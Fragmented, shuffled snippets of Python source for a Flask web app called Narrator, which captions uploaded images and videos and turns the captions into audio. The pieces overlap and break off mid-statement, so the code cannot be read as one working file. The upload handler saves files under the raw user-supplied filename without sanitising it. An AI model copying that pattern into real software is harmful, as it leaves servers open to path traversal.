"im_id]['caption'] gts = gts.apply(lambda x: narrator.coco_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda",
":len(im_names)] rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids = [x for x in",
"Load image and video datasets coco = COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF =",
"'image' + str(ix) + '.jpg', 'gt': im_sample['gt'], 'gt_audio': 'image' + str(ix) + '_gt.ogg',",
"get_upload(filename): \"\"\"Get path to file in upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def",
"+ 'sample_captions.csv') # Load samples IM_SAMPLES_DICT = [[], [], [], []] VID_SAMPLES_DICT =",
"== 'image': by_scene = False # Generate caption/audio and redirect to demo_output page",
"= [x for x in rand_vid_ids if x not in samplesDF['id'].values.tolist()][ :len(vid_names)] #",
"(name, vid_id) in enumerate(zip(vid_names, rand_vid_ids)): # Get video and generated caption url =",
"app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True)) # Find nearest gt",
"= os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path def split_filename(file): \"\"\"Split filename into name",
"= gt print('Videos updated!') # Save samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv') # Load",
"io import PIL from flask import render_template, request, redirect, url_for, send_from_directory, session from",
"if len(app.config['SAMPLES_TO_UPDATE']) > 0: # Load image and video datasets coco = COCO(app.config[",
"have been # chosen rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] == app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids = [x",
"videos(): \"\"\"Render video examples page.\"\"\" return render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes') def scenes():",
"name + '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') # update samples",
"'image' + str(ix) + '_gt.ogg', 'caption': im_sample['caption'], 'cap_audio': 'image' + str(ix) + '.ogg'",
"title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get path to file in upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'],",
"# Copy image to samples directory shutil.copy(url, app.config['SAMPLES_DIR'] + name + '.mp4') #",
"[x for x in app.config['SAMPLES_TO_UPDATE'] if 'video' in x] # Randomly select ids",
"Save samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv') # Load samples IM_SAMPLES_DICT = [[], [],",
"'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Videos updated!') # Save samples dataframe",
"'image' + str(ix) + '.ogg' }) VID_SAMPLES_DICT[int(i / 4)].append({ 'id': vid_sample['id'], 'url': 'video'",
"from pycocotools.coco import COCO sys.path.append('../src/') from Narrator import Narrator # Construct classes narrator",
"= determine_type(ext, by_scene) if typ == 'image': by_scene = False # Generate caption/audio",
"'.mp4', by_scene=True, as_string=True) # Create dataframe sceneSamplesDF = pd.DataFrame({ 'time': scene_change_timecodes, 'caption': captions",
"msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids = [x for x in rand_vid_ids if x",
"pd import skimage.io as io import PIL from flask import render_template, request, redirect,",
"'id'] = vid_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Videos updated!')",
"cap_audio=None): \"\"\"Render demo output page.\"\"\" # Duplicate of above -- allows if request.method",
"Backend of Narrator web app. \"\"\" import os import sys import shutil import",
"+ str(ix) + '.ogg' }) print(\"Samples loaded\") # Get filepath for scene example",
"= narrator.gen_caption( scene_example_file + '.mp4', by_scene=True, as_string=True) # Create dataframe sceneSamplesDF = pd.DataFrame({",
"page='images', title=app.config['TITLE']) @app.route('/videos') def videos(): \"\"\"Render video examples page.\"\"\" return render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos',",
"app.config['VID_EXTENSIONS']: if by_scene: return 'scene' return 'video' return 'image' def generate_caption(file, by_scene): \"\"\"Generate",
"# Load and save imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name + '.jpg')",
"= vid_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Videos updated!') #",
"# Find nearest gt nearest_gt = '' best_score = 0.0 for gt in",
"dataframe else: sceneSamplesDF = pd.read_csv(scene_example_file + '.csv') # Load scene example SCENE_SAMPLES_DICT =",
"+ 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv') msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine",
"file.filename.split('.') if isinstance(filename, list): filename = '_'.join(filename) # Replace existing . with _",
"narrator.coco_vocab.decode(x, clean=True)) # Find nearest gt nearest_gt = '' best_score = 0.0 for",
"caption) if bleu > best_score: best_score = bleu nearest_gt = gt gt =",
"len(app.config['SAMPLES_TO_UPDATE']) > 0: # Load image and video datasets coco = COCO(app.config[ 'COCOAPI_PATH']",
"encode/decode using vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption'] gts = gts.apply(lambda x: narrator.msrvtt_vocab.encode(",
"= ' '.join(caption).capitalize() # Copy image to samples directory shutil.copy(url, app.config['SAMPLES_DIR'] + name",
"existing . with _ return filename, ext def determine_type(ext, by_scene): \"\"\"Determine if image",
"is uploaded if request.method == 'POST': try: # Grab file, and if by_scene",
"@app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get path to file in upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename)",
"typ = determine_type(ext, by_scene) if typ == 'image': by_scene = False # Generate",
"gt nearest_gt = '' best_score = 0.0 for gt in gts: bleu =",
"dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv') # Load samples IM_SAMPLES_DICT = [[], [], [], []]",
"captions by scene captions, scene_change_timecodes = narrator.gen_caption( scene_example_file + '.mp4', by_scene=True, as_string=True) #",
"'time': scene_change_timecodes, 'caption': captions }) # Capitalize sceneSamplesDF['caption'] = sceneSamplesDF[ 'caption'].apply(lambda x: x.capitalize())",
"type file.filename = file.filename.replace(' ', '_') file_path = save_file(file) filename, ext = split_filename(file)",
"app.config['SAMPLES_TO_UPDATE'] if 'video' in x] # Randomly select ids from their respective datasets",
"+ '.ogg') # Update samples dataframe samplesDF.loc[name, 'id'] = im_id samplesDF.loc[name, 'caption'] =",
"'.mp4', 'gt': vid_sample['gt'], 'gt_audio': 'video' + str(ix) + '_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio': 'video'",
"0.0 for gt in gts: bleu = narrator.coco_vocab.evaluate([gt], caption) if bleu > best_score:",
"# Update any existing samples if len(app.config['SAMPLES_TO_UPDATE']) > 0: # Load image and",
"x not in samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids =",
"narrator.gen_caption(url, beam_size=8) # Get all gt captions and encode/decode using vocabulary gts =",
"in enumerate(zip(im_names, rand_im_ids)): # Get image and generated caption url = coco.loadImgs(im_id)[0]['coco_url'] caption",
"[x for x in rand_vid_ids if x not in samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate",
"page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename",
"url = app.config['MSRVTT_DATA_PATH'] + vid_id + '.mp4' caption = narrator.gen_caption(url, beam_size=8) # Get",
"session from app import app sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI') from pycocotools.coco import COCO sys.path.append('../src/')",
"redirect, url_for, send_from_directory, session from app import app sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI') from pycocotools.coco",
"VID_SAMPLES_DICT[int(i / 4)].append({ 'id': vid_sample['id'], 'url': 'video' + str(ix) + '.mp4', 'gt': vid_sample['gt'],",
"= False # Generate caption/audio and redirect to demo_output page if not by_scene:",
"+ name + '.mp4') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name",
"+ 1)) gts = gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True)) # Find nearest gt nearest_gt",
"@app.route('/videos') def videos(): \"\"\"Render video examples page.\"\"\" return render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes')",
"information and store to file for i, (name, im_id) in enumerate(zip(im_names, rand_im_ids)): #",
"directory shutil.copy(url, app.config['SAMPLES_DIR'] + name + '.mp4') # Generate audio files narrator.gen_audio_file( gt,",
"def scenes(): \"\"\"Render scene examples page.\"\"\" return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def",
"import os import sys import shutil import pandas as pd import skimage.io as",
"request.method == 'POST': try: # Grab file, and if by_scene is requested from",
"Grab file, and if by_scene is requested from website file = request.files['file'] by_scene",
"url_for, send_from_directory, session from app import app sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI') from pycocotools.coco import",
"demo(): \"\"\"Render demo page.\"\"\" # Check if file is uploaded if request.method ==",
"-- allows if request.method == 'POST': try: # Grab file, and if by_scene",
"row in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time': row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE'] + '.' + str(i) +",
"page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get path to file in upload directory.\"\"\" return",
"caption samplesDF.loc[name, 'gt'] = gt print('Images updated!') for i, (name, vid_id) in enumerate(zip(vid_names,",
"x in rand_im_ids if x not in samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] ==",
"vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption'] gts = gts.apply(lambda x: narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN']",
"[], []] VID_SAMPLES_DICT = [[], [], [], []] for i, ix in enumerate(range(16)):",
"if isinstance(filename, list): filename = '_'.join(filename) # Replace existing . with _ return",
"render_template('about.html', page='about', title=app.config['TITLE']) @app.route('/demo', methods=['GET', 'POST']) def demo(): \"\"\"Render demo page.\"\"\" # Check",
"captions, scene_change_timecodes = narrator.gen_caption( scene_example_file + '.mp4', by_scene=True, as_string=True) # Create dataframe sceneSamplesDF",
"updated!') for i, (name, vid_id) in enumerate(zip(vid_names, rand_vid_ids)): # Get video and generated",
"scene_example_file + '.' + str(i) + '.ogg') # Save samples dataframe sceneSamplesDF.to_csv(scene_example_file +",
"= 0.0 for gt in gts: bleu = narrator.msrvtt_vocab.evaluate([gt], caption) if bleu >",
"Get image and generated caption url = coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url, beam_size=8) #",
"'sample_captions.csv', index_col=0) except: samplesDF = pd.DataFrame( columns=['id', 'caption', 'gt'], index=['name']).head() # Update any",
"\\ filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save given file and return path.\"\"\"",
"title=app.config['TITLE']) @app.route('/contact') def contact(): \"\"\"Render contact me page.\"\"\" return render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about')",
"caption = narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption,",
"web app. \"\"\" import os import sys import shutil import pandas as pd",
"= '_'.join(filename) # Replace existing . with _ return filename, ext def determine_type(ext,",
"+ '.' + str(i) + '.ogg') scenes_dict.append({ 'time': time_codes[i], 'cap_audio': filename + '.'",
"filename, ext = split_filename(file) typ = determine_type(ext, by_scene) if typ == 'image': by_scene",
"'.csv'): # Generate captions by scene captions, scene_change_timecodes = narrator.gen_caption( scene_example_file + '.mp4',",
"str(i) + '.ogg') # Save samples dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False) # Load",
"im_sample['caption'], 'cap_audio': 'image' + str(ix) + '.ogg' }) VID_SAMPLES_DICT[int(i / 4)].append({ 'id': vid_sample['id'],",
"nearest_gt = gt gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Copy",
"captions and encode/decode using vocabulary gts = cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption'] gts = gts.apply(lambda",
"gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True)) # Find nearest gt nearest_gt = '' best_score =",
"APP #################################### ############################################################################## def allowed_file(filename): \"\"\"Determine if a file has an allowed extension.\"\"\"",
"== 'POST': try: # Grab file, and if by_scene is requested from website",
"caption='scene', cap_audio='scene')) except KeyError as e: print(e) return render_template('demo_output.html', filename=filename, typ=typ, caption=caption, cap_audio=cap_audio,",
"'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv') msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) #",
"if file is uploaded if request.method == 'POST': try: # Grab file, and",
"caption, app.config['SAMPLES_DIR'] + name + '.ogg') # update samples dataframe samplesDF.loc[name, 'id'] =",
"or video.\"\"\" if ext in app.config['VID_EXTENSIONS']: if by_scene: return 'scene' return 'video' return",
"'scene' return 'video' return 'image' def generate_caption(file, by_scene): \"\"\"Generate caption for given file\"\"\"",
"a file has an allowed extension.\"\"\" return '.' in filename and \\ filename.rsplit('.',",
"'gt'] = gt print('Videos updated!') # Save samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv') #",
"COCO sys.path.append('../src/') from Narrator import Narrator # Construct classes narrator = Narrator( root_path=app.config['ROOT_PATH'],",
"in x] # Randomly select ids from their respective datasets and reject any",
"scenes_dict.append({ 'time': time_codes[i], 'cap_audio': filename + '.' + str(i) + '.ogg', 'caption': caption.capitalize()",
"save_file(file): \"\"\"Save given file and return path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename))",
"samplesDF = pd.DataFrame( columns=['id', 'caption', 'gt'], index=['name']).head() # Update any existing samples if",
"audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] +",
"file try: samplesDF = pd.read_csv( app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0) except: samplesDF = pd.DataFrame(",
"'.' + str(i) + '.ogg') scenes_dict.append({ 'time': time_codes[i], 'cap_audio': filename + '.' +",
"'_gt.ogg', 'caption': im_sample['caption'], 'cap_audio': 'image' + str(ix) + '.ogg' }) VID_SAMPLES_DICT[int(i / 4)].append({",
"scene captions, scene_change_timecodes = narrator.gen_caption( scene_example_file + '.mp4', by_scene=True, as_string=True) # Create dataframe",
"= PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name + '.jpg') # Generate audio files narrator.gen_audio_file( gt,",
"str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({ 'id': im_sample['id'], 'url': 'image' + str(ix) + '.jpg', 'gt':",
"filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] + cap_audio) return redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio, caption=caption,",
"in upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get path to file",
"name + '.ogg') # update samples dataframe samplesDF.loc[name, 'id'] = vid_id samplesDF.loc[name, 'caption']",
"caption samplesDF.loc[name, 'gt'] = gt print('Videos updated!') # Save samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] +",
"Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR']",
"title=app.config['TITLE']) @app.route('/about') def about(): \"\"\"Render about page.\"\"\" return render_template('about.html', page='about', title=app.config['TITLE']) @app.route('/demo', methods=['GET',",
"samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate sample information and store to file for i, (name,",
"send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get path to file in samples directory.\"\"\" return",
"using vocabulary gts = cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption'] gts = gts.apply(lambda x: narrator.coco_vocab.encode( x,",
"scene example SCENE_SAMPLES_DICT = [] for i, row in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time': row['time'],",
"is requested from website file = request.files['file'] by_scene = 'by_scene' in request.form #",
"pycocotools.coco import COCO sys.path.append('../src/') from Narrator import Narrator # Construct classes narrator =",
"path to file in upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get",
"1)) gts = gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True)) # Find the nearest gt nearest_gt",
"'cap_audio': app.config['SCENE_EXAMPLE_FILE'] + '.' + str(i) + '.ogg', 'caption': row['caption'].capitalize() }) ############################################################################## #####################################",
"caption=\"\", cap_audio=None): \"\"\"Render demo output page.\"\"\" # Duplicate of above -- allows if",
"4)].append({ 'id': im_sample['id'], 'url': 'image' + str(ix) + '.jpg', 'gt': im_sample['gt'], 'gt_audio': 'image'",
"+ vid_id + '.mp4' caption = narrator.gen_caption(url, beam_size=8) # Get all gt captions",
"x] # Randomly select ids from their respective datasets and reject any that",
"caption = ' '.join(caption).capitalize() # Load and save imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR']",
"in enumerate(captions): narrator.gen_audio_file( caption, scene_example_file + '.' + str(i) + '.ogg') # Save",
"contact(): \"\"\"Render contact me page.\"\"\" return render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about') def about(): \"\"\"Render",
"# Construct classes narrator = Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'],",
"0: # Load image and video datasets coco = COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET']))",
"SCENE_SAMPLES_DICT.append({ 'time': row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE'] + '.' + str(i) + '.ogg', 'caption': row['caption'].capitalize()",
"file_path = save_file(file) filename, ext = split_filename(file) typ = determine_type(ext, by_scene) if typ",
"pd.read_csv( app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0) except: samplesDF = pd.DataFrame( columns=['id', 'caption', 'gt'], index=['name']).head()",
"samplesDF = pd.read_csv( app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0) except: samplesDF = pd.DataFrame( columns=['id', 'caption',",
"allowed if file and allowed_file(file.filename): # Fix filename, save to file, get ext",
"file.filename.replace(' ', '_') file_path = save_file(file) filename, ext = split_filename(file) typ = determine_type(ext,",
"in app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save given file and return path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'],",
"\"\"\"Render video examples page.\"\"\" return render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes') def scenes(): \"\"\"Render",
"page='about', title=app.config['TITLE']) @app.route('/demo', methods=['GET', 'POST']) def demo(): \"\"\"Render demo page.\"\"\" # Check if",
"already exist if not os.path.exists(scene_example_file + '.csv'): # Generate captions by scene captions,",
"app.config['SAMPLES_DIR'] + name + '.ogg') # Update samples dataframe samplesDF.loc[name, 'id'] = im_id",
"+ name + '.jpg') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name",
"if image or video.\"\"\" if ext in app.config['VID_EXTENSIONS']: if by_scene: return 'scene' return",
"# Get all gt captions and encode/decode using vocabulary gts = cocoCaptionDF[cocoCaptionDF['id'] ==",
"best_score = 0.0 for gt in gts: bleu = narrator.coco_vocab.evaluate([gt], caption) if bleu",
"pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv') msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine images and videos to",
"and encode/decode using vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption'] gts = gts.apply(lambda x:",
"image examples page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos') def videos(): \"\"\"Render video",
"'caption'].apply(lambda x: x.capitalize()) # Generate audio files for each caption for i, caption",
"page.\"\"\" return render_template('about.html', page='about', title=app.config['TITLE']) @app.route('/demo', methods=['GET', 'POST']) def demo(): \"\"\"Render demo page.\"\"\"",
"typ='image', caption=\"\", cap_audio=None): \"\"\"Render demo output page.\"\"\" # Duplicate of above -- allows",
"app.config['SAMPLES_DIR'] + name + '.ogg') # update samples dataframe samplesDF.loc[name, 'id'] = vid_id",
"it doesn't already exist if not os.path.exists(scene_example_file + '.csv'): # Generate captions by",
"}) # Capitalize sceneSamplesDF['caption'] = sceneSamplesDF[ 'caption'].apply(lambda x: x.capitalize()) # Generate audio files",
"videos to update im_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'image' in",
"\"\"\"Determine if a file has an allowed extension.\"\"\" return '.' in filename and",
"if x not in samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids",
"nearest gt nearest_gt = '' best_score = 0.0 for gt in gts: bleu",
"= ' '.join(caption).capitalize() # Load and save imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] +",
"in enumerate(range(16)): im_sample = samplesDF.loc['image' + str(ix)] vid_sample = samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i",
"= sceneSamplesDF[ 'caption'].apply(lambda x: x.capitalize()) # Generate audio files for each caption for",
"if by_scene is requested from website file = request.files['file'] by_scene = 'by_scene' in",
"by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file(",
"= narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR']",
"title=app.config['TITLE']) @app.route('/scenes') def scenes(): \"\"\"Render scene examples page.\"\"\" return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE'])",
"# Generate caption/audio by scene and redirect to demo_output # page captions, time_codes",
"@app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get path to file in samples directory.\"\"\" return send_from_directory(app.config['SAMPLES_DIR'], filename)",
"= COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv') msrvttCaptionDF =",
"gt in gts: bleu = narrator.msrvtt_vocab.evaluate([gt], caption) if bleu > best_score: best_score =",
"isinstance(filename, list): filename = '_'.join(filename) # Replace existing . with _ return filename,",
"app.config[ 'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE'] # Create scene example if it doesn't already exist",
"respective datasets and reject any that already have been # chosen rand_im_ids =",
"+ filename + '.' + str(i) + '.ogg') scenes_dict.append({ 'time': time_codes[i], 'cap_audio': filename",
"by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] + cap_audio) return redirect(url_for('uploaded_file',",
"+ app.config['SCENE_EXAMPLE_FILE'] # Create scene example if it doesn't already exist if not",
"i, caption in enumerate(captions): narrator.gen_audio_file( caption, scene_example_file + '.' + str(i) + '.ogg')",
"sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI') from pycocotools.coco import COCO sys.path.append('../src/') from Narrator import Narrator #",
"path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path def split_filename(file): \"\"\"Split filename",
"index=False) # Load samples dataframe else: sceneSamplesDF = pd.read_csv(scene_example_file + '.csv') # Load",
"Narrator import Narrator # Construct classes narrator = Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'],",
"demo_output page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio",
"cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get path to file in upload directory.\"\"\"",
"#################################### ############################################################################## def allowed_file(filename): \"\"\"Determine if a file has an allowed extension.\"\"\" return",
"page captions, time_codes = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict = [] for",
"and save imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name + '.jpg') # Generate",
"title=app.config['TITLE']) @app.route('/demo', methods=['GET', 'POST']) def demo(): \"\"\"Render demo page.\"\"\" # Check if file",
"for each caption for i, caption in enumerate(captions): narrator.gen_audio_file( caption, scene_example_file + '.'",
"an allowed extension.\"\"\" return '.' in filename and \\ filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS']",
"row['caption'].capitalize() }) ############################################################################## ##################################### APP #################################### ############################################################################## def allowed_file(filename): \"\"\"Determine if a file",
"render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images') def images(): \"\"\"Render image examples page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT,",
"try: # Grab file, and if by_scene is requested from website file =",
"send_from_directory, session from app import app sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI') from pycocotools.coco import COCO",
"Get all gt captions and encode/decode using vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption']",
"and determine type file.filename = file.filename.replace(' ', '_') file_path = save_file(file) filename, ext",
"in request.form # Check if filetype is allowed if file and allowed_file(file.filename): #",
"'video' + str(ix) + '.ogg' }) print(\"Samples loaded\") # Get filepath for scene",
"'.csv', index=False) # Load samples dataframe else: sceneSamplesDF = pd.read_csv(scene_example_file + '.csv') #",
"i, (name, im_id) in enumerate(zip(im_names, rand_im_ids)): # Get image and generated caption url",
"page.\"\"\" return render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about') def about(): \"\"\"Render about page.\"\"\" return render_template('about.html',",
"Generate sample information and store to file for i, (name, im_id) in enumerate(zip(im_names,",
"by_scene) if typ == 'image': by_scene = False # Generate caption/audio and redirect",
"samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Videos updated!') # Save samples",
"os import sys import shutil import pandas as pd import skimage.io as io",
"redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError as e: print(e) return render_template('demo.html', page='demo',",
"output page.\"\"\" # Duplicate of above -- allows if request.method == 'POST': try:",
"beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict = [] for i, caption in enumerate(captions): narrator.gen_audio_file(caption,",
"'_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') # Update samples dataframe samplesDF.loc[name,",
"= [[], [], [], []] for i, ix in enumerate(range(16)): im_sample = samplesDF.loc['image'",
"+ '.mp4', 'gt': vid_sample['gt'], 'gt_audio': 'video' + str(ix) + '_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio':",
"render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about') def about(): \"\"\"Render about page.\"\"\" return render_template('about.html', page='about', title=app.config['TITLE'])",
"determine_type(ext, by_scene): \"\"\"Determine if image or video.\"\"\" if ext in app.config['VID_EXTENSIONS']: if by_scene:",
"return render_template('demo.html', page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def uploaded_file(filename, typ='image', caption=\"\", cap_audio=None): \"\"\"Render",
"= caption samplesDF.loc[name, 'gt'] = gt print('Images updated!') for i, (name, vid_id) in",
"vid_sample['gt'], 'gt_audio': 'video' + str(ix) + '_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio': 'video' + str(ix)",
"+ 'annotations/coco_captions.csv') msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine images and videos to update im_names",
